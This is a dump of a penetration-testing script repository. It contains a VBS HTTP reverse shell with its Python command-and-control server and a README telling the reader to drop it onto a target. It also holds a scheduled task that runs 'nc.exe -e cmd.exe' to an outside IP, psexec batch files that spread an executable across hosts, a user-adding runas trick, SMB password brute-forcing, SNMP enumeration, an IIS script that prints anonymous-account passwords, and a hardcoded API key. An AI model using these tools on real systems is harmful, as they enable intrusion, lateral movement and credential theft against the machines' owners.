10 | 11 | How to use it 12 | ============= 13 | 14 | - Start the python server on your machine. 15 | - Adapt one of the VBS files with your IP address. 16 | - Drop this VBS file onto the target and execute it. 17 | 18 | Dependencies 19 | ============ 20 | 21 | - Python3 22 | 23 | License 24 | ======= 25 | 26 | This program is under the GPLv3 License. 27 | 28 | You should have received a copy of the GNU General Public License 29 | along with this program. If not, see . 30 | -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/reverse_shell.vbs: -------------------------------------------------------------------------------- 1 | Option Explicit 2 | On Error Resume Next 3 | 4 | CONST callbackUrl = "http://localhost:80/" 5 | 6 | Dim xmlHttpReq, shell, execObj, command, break, result 7 | 8 | Set shell = CreateObject("WScript.Shell") 9 | 10 | break = False 11 | While break <> True 12 | Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP") 13 | xmlHttpReq.Open "GET", callbackUrl, false 14 | xmlHttpReq.Send 15 | 16 | command = "cmd /c " & Trim(xmlHttpReq.responseText) 17 | 18 | If InStr(command, "EXIT") Then 19 | break = True 20 | Else 21 | Set execObj = shell.Exec(command) 22 | 23 | result = "" 24 | Do Until execObj.StdOut.AtEndOfStream 25 | result = result & execObj.StdOut.ReadAll() 26 | Loop 27 | 28 | Set xmlHttpReq = WScript.CreateObject("MSXML2.ServerXMLHTTP") 29 | xmlHttpReq.Open "POST", callbackUrl, false 30 | xmlHttpReq.Send(result) 31 | End If 32 | Wend 33 | -------------------------------------------------------------------------------- /ReverseShell/vbs-reverse-shell/server.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import socketserver 4 | 5 | PORT=80 6 | 7 | class CmdHttpHandler(socketserver.BaseRequestHandler): 8 | def handle(self): 9 | self.data = self.request.recv(2**14).strip().decode("UTF-8") 10 | 11 | if 
len(data) == 0: 12 | return 13 | 14 | elif self.data.splitlines()[0].startswith("GET"): 15 | command = input("%s > " % self.client_address[0]).encode("UTF-8") 16 | 17 | response = (b"HTTP/1.1 200\ncontent-length: " 18 | + str(len(command)).encode("UTF-8") 19 | + b"\n\n" 20 | + command) 21 | 22 | self.request.sendall(response) 23 | 24 | 25 | elif self.data.splitlines()[0].startswith("POST"): 26 | data = self.request.recv(2**14).strip().decode("UTF-8") 27 | print(data) 28 | print() 29 | 30 | response = (b"HTTP/1.1 200\ncontent-length: 0\n\n") 31 | self.request.sendall(response) 32 | return 33 | 34 | 35 | else: 36 | print(self.data.decode("UTF-8")) 37 | response = (b"HTTP/1.1 300\ncontent-length: 0\n\n") 38 | self.request.sendall(response) 39 | 40 | 41 | def main(): 42 | print("To close connection enter 'EXIT'") 43 | print("The computer may be stalled by some commands, just try again") 44 | print() 45 | 46 | with socketserver.TCPServer(("0.0.0.0", PORT), CmdHttpHandler) as server: 47 | server.serve_forever() 48 | 49 | 50 | if __name__ == "__main__": 51 | main() 52 | -------------------------------------------------------------------------------- /RunAs/RunAsSpc.txt: -------------------------------------------------------------------------------- 1 | RunAsSpc = runas + password + encryption 2 | 3 | https://robotronic.de/guidance.html 4 | 5 | ADD USER: 6 | C:\windows\temp> echo net user xiaoxiaoleo xiaoxiaoleo /add > addme.bat 7 | C:\windows\temp> runasspc.exe /program:"addme.bat" /user:"administrator" /password:"password" 8 | -------------------------------------------------------------------------------- /RunAs/runas.ps1: -------------------------------------------------------------------------------- 1 | secpasswd = ConvertTo-SecureString "" -AsPlainText -Force 2 | $mycreds = New-Object System.Management.Automation.PSCredential ("", $secpasswd) 3 | $computer = "" 4 | [System.Diagnostics.Process]::Start("C:/users/public/","", $mycreds.Username, mycreds.Password, 
$computer) 5 | 6 | 7 | # powershell -ExecutionPolicy Bypass -File c:\users\public\run.ps1 8 | -------------------------------------------------------------------------------- /RunAs/schtasks.txt: -------------------------------------------------------------------------------- 1 | schtasks /query 2 | 3 | 4 | time /t 5 | 6 | schtasks /create /tn "MyTaskName" /tr "c:\users\public\nc.exe x.x.x.x -e cmd.exe" /sc DAILY /st 08:26:00 /ru administrator /rp password 7 | 8 | schtasks /delete /tn MyTaskName /F 9 | -------------------------------------------------------------------------------- /SMB/net_share_brute_force.txt: -------------------------------------------------------------------------------- 1 | acccheck 2 | Attempts to connect to the IPC$ and ADMIN$ shares depending on which flags have been 3 | chosen, and tries a combination of usernames and passwords in the hope to identify 4 | the password to a given account via a dictionary password guessing attack. 5 | 6 | root@kali:~# acccheck -T pentest/labs/targets.txt -u Administrator -p xxxxx 7 | -------------------------------------------------------------------------------- /SNMP/scan.txt: -------------------------------------------------------------------------------- 1 | 2 | Nmap -sU --open -p 161 x.x.x.x -oG output.txt 3 | 4 | 5 | § snmpcheck -t $ip -c public 6 | § snmpwalk -c public -v1 $ip 1| 7 | § grep hrSWRunName|cut -d\* \* -f 8 | § snmpenum -t $ip 9 | onesixtyone -c names -i hosts 10 | 11 | 12 | echo public > community 13 | echo private >> community 14 | echo manager >> community 15 | for ip in $(seq 1 254); do echo 10.11.1.$ip; done > ips 16 | onesixtyone -c community -i ips 17 | 18 | # Enumerate windows users 19 | snmpwalk -c public -v1 10.11.1.14 1.3.6.1.4.1.77.1.2.25 20 | # Enumerate windows processes 21 | snmpwalk -c public -v1 10.11.1.14 1.3.6.1.2.1.25.4.2.1.2 22 | # Enumerate Open TCP ports 23 | snmpwalk -c public -v1 10.11.1.204 1.3.6.1.2.1.6.13.1.3 24 | # Enumerate installed software 25 | snmpwalk -c 
public -v1 10.11.1.204 1.3.6.1.2.1.25.6.3.1.2 26 | -------------------------------------------------------------------------------- /Web/Domain/bing_api.py: -------------------------------------------------------------------------------- 1 | import urllib2, socket,sys,base64 2 | from xml.dom.minidom import parse, parseString 3 | 4 | 5 | def showhelp(): 6 | print """------------""" 7 | 8 | 9 | def bing(account_key,ip): 10 | sites = [] 11 | skip = 0 12 | top = 50 13 | 14 | while skip < 200: 15 | url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(ip,top,skip) 16 | request = urllib2.Request(url) 17 | auth = base64.encodestring("%s:%s" % (account_key, account_key)).replace("\n", "") 18 | request.add_header("Authorization", "Basic %s" % auth) 19 | res = urllib2.urlopen(request) 20 | data = res.read() 21 | 22 | xmldoc = parseString(data) 23 | site_list = xmldoc.getElementsByTagName('d:Url') 24 | for site in site_list: 25 | domain = site.childNodes[0].nodeValue 26 | domain = domain.split("/")[2] 27 | if domain not in sites: 28 | sites.append(domain) 29 | 30 | skip += 50 31 | #print "######################################" 32 | print "%s : %s" %(ip,len(sites)) 33 | for site in sites: 34 | print ' '+site 35 | return sites 36 | #print "######################################" 37 | 38 | 39 | def options(arguments): 40 | try: 41 | count = 0 42 | ip = "" 43 | account_key = "gQxNd7GPn2yASnBDHWJqRZWe5cKrlqo257yf/LdKOII" 44 | for arg in arguments: 45 | if arg == "-ip": 46 | ip = arguments[count+1] 47 | elif arg == "-domain": 48 | ip = socket.gethostbyname(arguments[count+1]) 49 | elif arg == "-key": 50 | account_key = arguments[count+1] 51 | count = count+1 52 | bing(account_key,ip) 53 | except: 54 | print "something went wrong" 55 | 56 | if __name__ == "__main__": 57 | if len(sys.argv) <= 3 or "-key" not in sys.argv: 58 | showhelp() 59 | bing("gQxNd7GPn2yASnBDHWJqRZWe5cKrlqo257yf/",'x.x.x.x') 60 | sys.exit() 61 | else: 
62 | options(sys.argv) 63 | -------------------------------------------------------------------------------- /Web/Recon/simple_wp_check.py: -------------------------------------------------------------------------------- 1 | from urllib import request 2 | import re 3 | import http.client 4 | 5 | urllist=[] 6 | def Readurl(filename,listurl): 7 | f = open(filename) 8 | for line in f: 9 | line = line.split('\n') 10 | #print(line[0]) 11 | listurl.append(line[0]) 12 | 13 | #Judges(line[0]) 14 | f.close() 15 | print(listurl) 16 | 17 | def Judges(url,test): 18 | 19 | if 'http:' in url: 20 | pass 21 | else: 22 | url='http://'+url 23 | print(url) 24 | try: 25 | r = request.urlopen(url) 26 | bytecode = r.read() 27 | htmlstr = bytecode.decode() 28 | if test in htmlstr: 29 | return 1 30 | else: 31 | return 0 32 | except: 33 | return 0 34 | 35 | def getResponseCode(url,xx): 36 | if 'http:' in url: 37 | url= url[7:] 38 | print(url) 39 | 40 | conn = http.client.HTTPConnection(url,80,timeout=10) 41 | 42 | try: 43 | conn.request("GET", xx) 44 | r1 = conn.getresponse() 45 | if r1.status==200: 46 | return 1 47 | else: 48 | return 0 49 | except: 50 | return 0 51 | 52 | 53 | 54 | 55 | 56 | #Judges('http://baidu.com','test') 57 | Readurl('url.txt',urllist) 58 | 59 | 60 | for i in urllist: 61 | if(Judges(i,'WordPress') or Judges(i+'/robots.txt','wp') or getResponseCode(i,'\wp-login.php') or getResponseCode(i,'\wp-login.php')): 62 | print('wordpress'+i) 63 | else: 64 | print(i) 65 | -------------------------------------------------------------------------------- /WebExp/DotNetPaddingAttack.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | # 3 | # PoC for checking if MS10-070 patch is applied by providing a .NET 4 | # application ScriptResource or WebResource resource handler's 'd' block 5 | # 6 | # Credits go to: 7 | # 8 | # * Juliano Rizzo - for the amazing research and hints about the remote 9 | # passive check 10 | # 11 | 
# 12 | # * Brian Holyfield - for his tool to exploit Padding Oracle attacks in a 13 | # generic and easy way 14 | # 15 | # 16 | # * Giorgio Fedon - for initial Perl version of this check 17 | # 18 | # 19 | # * Alejo Murillo Moya - for testing and ideas 20 | # 21 | # 22 | # Copyright (c) 2010 Bernardo Damele A. G. 23 | # 24 | # 25 | # Example of unpatched system: 26 | # 27 | # * /WebResource.axd?d=kHoDoPikaYfoTe1m9Ol5iQ2 28 | # * /ScriptResource.axd?d=2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10 29 | # 30 | # Examples of patched system: 31 | # 32 | # * /WebResource.axd?d=VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0 33 | # * /ScriptResource.axd?d=Gcb5Zt1XkIPHAYC3l5vZ4QidrZMKISjkqnMQRQDqRD88oxkWIL1kNBQThGrDJBbaKqPd9AyT-jF1EhM-rame5NXv7RLQRhtlz-xfoQlHXf_pjgiBJW7ntGxhegohUeNFlo9x8_RMU6ocDmwwK6dfIRDFbX01 34 | 35 | import sys 36 | 37 | def base64decode(string): 38 | return string.decode("base64") 39 | 40 | def hexdecode(string): 41 | string = string.lower() 42 | 43 | if string.startswith("0x"): 44 | string = string[2:] 45 | 46 | return string.decode("hex") 47 | 48 | def hexencode(string): 49 | return string.encode("hex") 50 | 51 | def dotNetUrlTokenDecode(string): 52 | """ 53 | Ported from padbuster v0.3 by Brian Holyfield: 54 | 55 | sub web64Decode { 56 | my ($input, $net) = @_; 57 | # net: 0=No Padding Number, 1=Padding (NetUrlToken) 58 | $input =~ s/\-/\+/g; 59 | $input =~ s/\_/\//g; 60 | if ($net == 1) 61 | { 62 | my $count = chop($input); 63 | $input = $input.("=" x int($count)); 64 | } 65 | return decode_base64($input); 66 | } 67 | """ 68 | 69 | string = string.replace("-", "+").replace("_", "/") 70 | count = string[-1] 71 | 72 | if count.isdigit(): 73 | string = string[:-1] + ("=" * int(count)) 74 | 75 | return base64decode(string) 76 | 77 | def usage(): 78 | print """ 79 | Use: 80 | 81 | ./ms10-070_check.py 82 | 83 | Note: 84 | 85 | Encrypted 'd' block MUST be from 
ScriptResource.axd or WebResource.axd. 86 | Parse the application response body to find a valid one. 87 | 88 | Examples: 89 | 90 | With ScriptResource.axd 'd' block: 91 | $ ./ms10-070_check.py 2nYOzoKtRvjs-g53K3r7VKmEXeQl_XMNY8nDEwcgwGVcS5Z8b9GanbNdzIgg493kfB_oInMb2DtFFEy5e-ajqdwMbg1F96l10 92 | Your application is VULNERABLE, patch against MS10-070 93 | 94 | With WebResource.axd 'd' block: 95 | ./ms10-070_check.py VHYaLecZ91Zjq-_4mV3ftpYrTteh9kHzk9zwLyjpAZAOjWL3nbx1SmIeGdHJwBu_koMj8ZGAqrtxCJkW0 96 | Your application is NOT vulnerable 97 | """ 98 | 99 | def main(): 100 | if len(sys.argv) < 2: 101 | usage() 102 | sys.exit(1) 103 | 104 | if (len(dotNetUrlTokenDecode(sys.argv[1])) % 8) == 0: 105 | print "Your application is VULNERABLE, patch against MS10-070" 106 | else: 107 | print "Your application is NOT vulnerable" 108 | 109 | if __name__ == '__main__': 110 | main() 111 | -------------------------------------------------------------------------------- /bat/cmd压缩解压/atzip.bat: -------------------------------------------------------------------------------- 1 | zip.exe -r temp.zip wwwroot -------------------------------------------------------------------------------- /bat/cmd压缩解压/readme.bat: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/readme.bat -------------------------------------------------------------------------------- /bat/cmd压缩解压/unzip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/unzip.exe -------------------------------------------------------------------------------- /bat/cmd压缩解压/wwwroot/atzip.bat: -------------------------------------------------------------------------------- 1 | zip.exe -r temp.zip wwwroot 
-------------------------------------------------------------------------------- /bat/cmd压缩解压/wwwroot/zip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/wwwroot/zip.exe -------------------------------------------------------------------------------- /bat/cmd压缩解压/zip.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/cmd压缩解压/zip.exe -------------------------------------------------------------------------------- /bat/dsquery ou 所有pc/allou.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/dsquery ou 所有pc/allou.txt -------------------------------------------------------------------------------- /bat/dsquery ou 所有pc/test.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (allou.txt) do ( 3 | echo %%i 4 | 5 | 6 | 7 | ) -------------------------------------------------------------------------------- /bat/exe可否执行/a.exe: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/exe可否执行/a.exe -------------------------------------------------------------------------------- /bat/exe可否执行/test.txt: -------------------------------------------------------------------------------- 1 | serivce test file! 
2 | -------------------------------------------------------------------------------- /bat/net_use.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | net use \\TS0002\c$ l /user:loc\fa 3 | copy template.exe \\TS0002\c$\windows\temp\template.exe 4 | psexec.exe /accepteula 5 | Psexec.exe -s \\TS0002 c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\template.exe 6 | net use \\TS0002\c$ /del 7 | 8 | @echo off 9 | for /f %%i in (netview.txt) do ( 10 | net use %%i\c$ "password" /user:user\locaback 11 | copy template.exe %%i\c$\windows\temp\temp.exe 12 | psexec /accepteula 13 | Psexec -s %%i c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\temp.exe 14 | net use %%i\c$ 15 | ) 16 | -------------------------------------------------------------------------------- /bat/ping/netview1.txt: -------------------------------------------------------------------------------- 1 | ff 2 | ff 3 | -------------------------------------------------------------------------------- /bat/ping/test1.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (netview1.txt) do ( 3 | echo %%i 4 | echo %%i >> ping.txt 5 | ping %%i^ -n -1 >> ping1.txt 6 | 7 | 8 | ) -------------------------------------------------------------------------------- /bat/pingbat.bat: -------------------------------------------------------------------------------- 1 | @echo off 2 | for /f %%i in (netview.txt) do ( 3 | net use \\%%i "G" /user:NT\SQL3 4 | copy template.exe \\%%i\c$\windows\temp\template.exe 5 | psexec.exe /accepteula 6 | Psexec.exe -s \\%%i c:\WINDOWS\system32\cmd.exe /c start c:\WINDOWS\temp\template.exe 7 | net use \\%%i /del 8 | 9 | ) -------------------------------------------------------------------------------- /bat/收集系统信息.bat: -------------------------------------------------------------------------------- 1 | whoami >c:\windows\temp\cat.txt 2 | systeminfo >>c:\windows\temp\cat.txt 3 | 
ipconfig /all >>c:\windows\temp\cat.txt 4 | arp -a>>c:\windows\temp\cat.txt 5 | netstat -an>>c:\windows\temp\cat.txt -------------------------------------------------------------------------------- /bat/遍历所有子目录子文件/xlc.bat: -------------------------------------------------------------------------------- 1 | ::ref:http://stackoverflow.com/questions/8487489/batch-programming-get-relative-path-of-file 2 | 3 | @echo off & setlocal enabledelayedexpansion 4 | 5 | set rootdir=%~dp0 6 | set foo=%rootdir% 7 | set cut= 8 | :loop 9 | if not "!foo!"=="" ( 10 | set /a cut += 1 11 | set foo=!foo:~1! 12 | goto :loop 13 | ) 14 | echo Root dir: %rootdir% 15 | echo strlen : %cut% 16 | echo ------------------------ 17 | :: also remove leading / 18 | set /a cut += 1 19 | 20 | for /R %rootdir% %%F in (.,*) do ( 21 | set B=%%~fF 22 | ::take substring of the path 23 | set B=!B:~%cut%! 24 | ::echo Full : %%F 25 | echo \!B! 26 | 27 | echo \!B!>>%~n0.txt 28 | ) 29 | echo ------------------------ 30 | echo result saved in %~n0.txt . 31 | 32 | 33 | 34 | pause -------------------------------------------------------------------------------- /bat/遍历所有子目录子文件/xlc.txt: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/xiaoxiaoleo/pentest-script/c3f5896da18aa0b18d0a133e937ce5c5a86f7e53/bat/遍历所有子目录子文件/xlc.txt -------------------------------------------------------------------------------- /quickput.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | """ 3 | QuickPut 1.5 - http://infomesh.net/2001/QuickPut/ 4 | 5 | This is a program that enables one to load files onto a server using 6 | the HTTP PUT method. It supports basic and digest authentication. 7 | 8 | Usage: QuickPut [ --help ] [ --v ] file http_uri [ uname pswd ] 9 | 10 | --help - Prints this message out 11 | --v - Turns on "verbose" mode 12 | 13 | "file" is the local file to upload, and "http_uri" is the target. 
14 | "uname" and "pswd" are optional authentication details. 15 | """ 16 | 17 | __author__ = 'Sean B. Palmer' 18 | __license__ = 'Copyright (C) 2001 Sean B. Palmer. GNU GPL 2' 19 | __version__ = '1.5' 20 | __cvsid__ = '$Id$' 21 | 22 | import sys, string, re, os, base64, md5, sha, time 23 | import httplib, urlparse, urllib, urllib2 24 | 25 | UAID = 'QuickPut/'+__version__+' (http://infomesh.net/2001/QuickPut/)' 26 | if ('-v' in sys.argv) or ('--v' in sys.argv): VERBOSE = 1 27 | else: VERBOSE = 0 28 | 29 | def perr(s): 30 | """The standard error printing function. 31 | Can go to STDERR, STDOUT, or both.""" 32 | if VERBOSE: 33 | sys.stderr.write(s.strip()+'\n\n') 34 | print s.strip()+'\n' 35 | 36 | def precondition(uri, auth=None): 37 | """HEAD a resource, and return the code 38 | Could be extended to get the ETag, etc.""" 39 | perr('Sending HEAD request to: '+uri) 40 | u = urlparse.urlparse(uri) 41 | n, p = u[1], u[2] 42 | if '@' in n: sys.exit(0) 43 | h = httplib.HTTP(n) 44 | h.putrequest('HEAD', p) 45 | if auth: 46 | perr('Auth: '+str(auth)) 47 | if 'type' in auth.keys(): 48 | if auth['type'] == 'Basic': authtobasic(auth, h) 49 | elif auth['type'] == 'Digest': authtodigest(auth, h, uri, 'HEAD') 50 | h.putheader('Accept', '*/*') 51 | h.putheader('Accept-Encoding', '*,deflate') 52 | h.putheader('TE', 'trailers,deflate') 53 | h.putheader('User-Agent', UAID) 54 | h.putheader('Connection', 'TE,Keep-Alive') 55 | h.endheaders() 56 | errcode, errmsg, headers = h.getreply() 57 | h.close() 58 | perr('HEAD response code: '+str(errcode)+'\nResponse headers: '+str(headers)) 59 | if auth: 60 | if ('type' in auth.keys()) and (errcode == 401): 61 | perr('Authorization failed!\n'+'Auth: '+headers['www-authenticate']) 62 | sys.exit(0) # Stops it from contunually looping 63 | return errcode, errmsg, headers 64 | 65 | def put(fn, uri, auth=None): 66 | errcode, errmsg, headers = precondition(uri, auth=auth) 67 | if errcode in (301, 302): 68 | if not auth: put(fn, headers['Location']) 
# ---- tail of put(): its signature and the start of the 3xx branch are above ----
        else: put(fn, headers['Location'], auth=auth)
    elif errcode == 401:
        wwwauth = headers['www-authenticate']
        # NOTE(review): re.match() returns None when the challenge is not of the
        # form '<scheme> realm="..."' (e.g. a bare scheme word); .groups() then
        # raises AttributeError instead of a readable error.
        match = re.match('[ \t]*([^ \t]+)[ \t]+realm="([^"]*)"', wwwauth)
        scheme, realm = match.groups()
        if scheme.lower() == 'basic':
            perr('HTTP Basic authentication spotted')
            if not auth:
                perr('No authentication details given!')
                sys.exit(0)  # stops it from continually looping
            # The caller's auth dict is mutated in place and the PUT is re-issued
            # with credentials attached (authtobasic below).  The transport is
            # plain httplib.HTTP, so Basic credentials travel base64-encoded,
            # not encrypted.
            auth['type'] = 'Basic'
            put(fn, uri, auth=auth)
        elif scheme.lower() == 'digest':
            # 2001-07-19 14:08:03 pls support digest auth as well as
            # basic. Don't encourage users to send their passwords in the clear.
            perr('HTTP Digest authentication spotted')
            if not auth:
                perr('No authentication details given!')
                sys.exit(0)
            # The raw WWW-Authenticate value is kept for the challenge parser.
            auth['type'], auth['data'] = 'Digest', wwwauth
            put(fn, uri, auth=auth)
    elif errcode in (200, 204, 206, 404): putdata(fn, uri, auth=auth)
    else: perr('Got error code: '+str(errcode))  # e.g. 403, 501

# Basic Authentication

def authtobasic(auth, h):
    """Converts basic auth data into an HTTP header.

    auth -- dict with 'uname' and 'pswd' (the 'type' key is not read here)
    h    -- an httplib.HTTP connection that is still accepting headers

    "user:pass" is percent-decoded first (a %-escaped password given on the
    command line is sent decoded), then base64-encoded; encodestring()
    appends a newline, hence the strip().
    NOTE(review): the finished Authorization value is echoed through perr(),
    so any captured output of this tool contains the reversibly-encoded
    credentials.
    """
    userpass = auth['uname']+':'+auth['pswd']
    userpass = base64.encodestring(urllib.unquote(userpass)).strip()
    h.putheader('Authorization', 'Basic '+userpass)
    perr('Authorization: Basic '+userpass)

# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# D I G E S T   A U T H E N T I C A T I O N   S T U F F
# These functions are based on the stuff in urllib2
#

def authtodigest(auth, h, uri, method):
    """Add a Digest Authorization header for `method uri` to connection `h`.

    auth['data'] must hold the server's WWW-Authenticate value (stored by put()).
    NOTE(review): http_digest_auth() returns None when the challenge is
    unusable; putheader() is then given None and the perr() concatenation
    raises TypeError.
    """
    user, pw, a = auth['uname'], auth['pswd'], auth['data']
    x = http_digest_auth(a, uri, user, pw, method)
    h.putheader('Authorization', x)
    perr('Authorization: '+x)

def http_digest_auth(a, uri, user, pw, method):
    """Turn a 'Digest k=v, ...' challenge into the Authorization header value.

    Returns 'Digest ...', or None (implicitly) when get_authorization() fails.
    `token` (the scheme word) is split off and not used further.
    """
    token, challenge = a.split(' ', 1)
    chal = urllib2.parse_keqv_list(urllib2.parse_http_list(challenge))
    a = get_authorization(chal, uri, user, pw, method)
    if a: return 'Digest %s' % a

def get_authorization(chal, uri, user, pw, method):
    """Compute the digest response (RFC 2069 style, no qop) for one challenge.

    Returns the comma-separated parameter string, or None when the challenge
    lacks realm/nonce or names an algorithm without an H implementation.
    NOTE(review): no qop / cnonce / nc parameters are produced, so a server
    that requires qop="auth" (RFC 2617) is expected to reject this response.
    """
    try:
        realm, nonce = chal['realm'], chal['nonce']
        algorithm, opaque = chal.get('algorithm', 'MD5'), chal.get('opaque', None)
    except KeyError: return None
    H, KD = get_algorithm_impls(algorithm)
    if H is None: return None
    # A1 = user:realm:password, A2 = method:uri; response = KD(H(A1), nonce:H(A2))
    A1, A2 = "%s:%s:%s" % (user, realm, pw), "%s:%s" % (method, uri)
    respdig = KD(H(A1), "%s:%s" % (nonce, H(A2)))
    base = 'username="%s", realm="%s", nonce="%s", uri="%s", ' \
           'response="%s"' % (user, realm, nonce, uri, respdig)
    if opaque: base = base + ', opaque="%s"' % opaque
    if algorithm != 'MD5': base = base + ', algorithm="%s"' % algorithm
    return base

def get_algorithm_impls(algorithm):
    """Return (H, KD) hash helpers for 'MD5' or 'SHA'.

    NOTE(review): for any other algorithm name H is never assigned, so the
    `H=H` default in KD raises UnboundLocalError here -- the `H is None`
    guard in get_authorization() can never trigger.
    """
    if algorithm == 'MD5':
        H = lambda x, e=urllib2.encode_digest:e(md5.new(x).digest())
    elif algorithm == 'SHA':
        H = lambda x, e=urllib2.encode_digest:e(sha.new(x).digest())
    KD = lambda s, d, H=H: H("%s:%s" % (s, d))
    return H, KD

#
# End of Digest Authentication functions
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # #

def putdata(fn, uri, auth=None):
    """Send the contents of file `fn` as an HTTP PUT to `uri`.

    auth -- None, or a dict with 'uname'/'pswd' and optionally 'type'
            ('Basic' or 'Digest', plus 'data' for Digest); filled in by put().

    The connection is httplib.HTTP to the URI's netloc -- plain text; the
    URI scheme is ignored, so https:// is not handled as TLS here.  The file
    is opened in text mode ('r'), so on platforms that translate line endings
    a binary payload is altered, and the handle is never closed explicitly.
    """
    f, u = open(fn, 'r'), urlparse.urlparse(uri)
    b = f.read()
    s = str(len(b))
    n, p = u[1], u[2]   # netloc and path of the target URI
    # The first 35 bytes of the payload are echoed through perr().
    perr('PUTing to: '+uri+'\nData: Content-Length: '+s+', Snippet: "'+b[:35]+'"')
    h = httplib.HTTP(n)
    h.putrequest('PUT', p)
    h.putheader('Accept', '*/*')
    h.putheader('Allow', 'PUT')
    if auth:
        if 'type' in auth.keys():
            if auth['type'] == 'Basic': authtobasic(auth, h)
            elif auth['type'] == 'Digest': authtodigest(auth, h, uri, 'PUT')
    h.putheader('Accept-Encoding', '*,deflate')
    # Expect: 100-continue is announced, but the body is sent below without
    # waiting for an interim 100 response.
    h.putheader('Expect', '100-continue')
    h.putheader('User-Agent', UAID)
    h.putheader('Connection', 'Keep-Alive')
    h.putheader('Content-Type', 'text/html')   # fixed type, whatever the file holds
    h.putheader('Content-Length', s)
    h.endheaders()
    h.send(b)
    perr('Getting reply...')
    errcode, errmsg, headers = h.getreply()
    # body = h.getfile().read(500)
    perr('Got reply')
    h.close()
    if errcode in (301, 302):
        perr('PUT data error code was '+str(errcode))
        # NOTE(review): the redirect is followed with the same auth dict and no
        # hop limit, so credentials are re-sent to whatever host Location names.
        if not auth: put(fn, headers['Location'])
        else: put(fn, headers['Location'], auth=auth)
    elif errcode == 401:
        perr('Authorization failed!\n'+'Auth: '+headers['www-authenticate'])
        sys.exit(0)  # stops it from continually looping
    else:
        perr('Done: '+str(errcode)+': '+str(errmsg)+'\n'+str(headers))
        if errcode in (200, 201, 204):
            sys.stderr.write('PUT succeeded!')
            # perr(body)
        elif errcode == 405: sys.stderr.write('PUT failed!')
        elif errcode == 404: perr('PUT failed: 404!')

# Utility functions

def prompt():
    """Prompts for the file name and URI to PUT to, then calls put() without auth.

    Not reached from run(); kept as an interactive entry point.
    NOTE(review): uri[-1] raises IndexError on an empty answer.
    """
    sys.stderr.write('Enter the name of the file you want to HTTP PUT: \n')
    fn = raw_input()
    sys.stderr.write('Enter the URI to HTTP PUT to: \n')
    uri = raw_input()
    if uri[-1] == '/':
        sys.stderr.write('URI ends with a "/"; please enter a file name: \n')
        urifn = raw_input()
        uri = uri+urifn
    sys.stderr.write('Thank you. Saving to: '+uri+'\n')
    put(fn, uri)

def help():
    """Print the module docstring as usage text and exit (shadows builtin help)."""
    print string.strip(__doc__)
    sys.exit(0)

def run():
    """Command-line entry: FILE URI [USER PASS].

    Any argument starting with '-' is dropped before counting; -help/--help
    print the usage.  With exactly four positional arguments the last two
    become the credentials used for Basic or Digest auth.
    NOTE(review): a password passed as an argument is visible to other local
    users via the process list and shell history.  An empty-string argument
    makes x[0] raise IndexError.
    """
    HelpFlags, argv = ('-help', '--help'), sys.argv[:]
    for x in sys.argv:
        if x in HelpFlags: help()
        if x[0] == '-': argv.remove(x)
    s = len(argv)-1   # positional argument count (argv[0] is the script)
    # perr(str(argv)+' '+str(VERBOSE))
    if s == 2: put(argv[1], argv[2])
    elif s == 4: put(argv[1], argv[2], auth={'uname': argv[3], 'pswd': argv[4]})
    else: help()

if __name__=="__main__":
    run()
--------------------------------------------------------------------------------
/vbs/finddomaincontrol.vbs:
--------------------------------------------------------------------------------
' Bind to the directory's rootDSE and print its serverName attribute
' (the DN of the directory server this bind landed on).
set obj=GetObject("LDAP://rootDSE")
wscript.echo obj.servername
--------------------------------------------------------------------------------
/vbs/iis.vbs:
--------------------------------------------------------------------------------
' Walk the IIS metabase under IIS://LocalHost/W3SVC and print one line per
' web site: comment, anonymous account name AND password, bindings, home path.
' The anonymous-user password is read in clear text from the metabase, so the
' output of this script is a credential dump and must be handled as such.
Set ObjService=GetObject("IIS://LocalHost/W3SVC")

For Each obj3w In objservice
    ' Drop the 22-character "IIS://LocalHost/W3SVC/" prefix; what is left is
    ' the child key name.  Sites are the purely numeric children (1, 2, ...).
    childObjectName=replace(obj3w.AdsPath,Left(obj3w.Adspath,22),"")
    if IsNumeric(childObjectName)=true then
        set IIs=objservice.GetObject("IIsWebServer",childObjectName)
        ' NOTE(review): there is no On Error Resume Next, so a failing GetObject
        ' ends the script before this test; and "exit for" runs first, which
        ' leaves the msgbox and wscript.quit below unreachable.
        if err.number<>0 then
            exit for
            msgbox("error!")
            wscript.quit
        end if
        serverbindings=IIS.serverBindings   ' array; joined with "," below
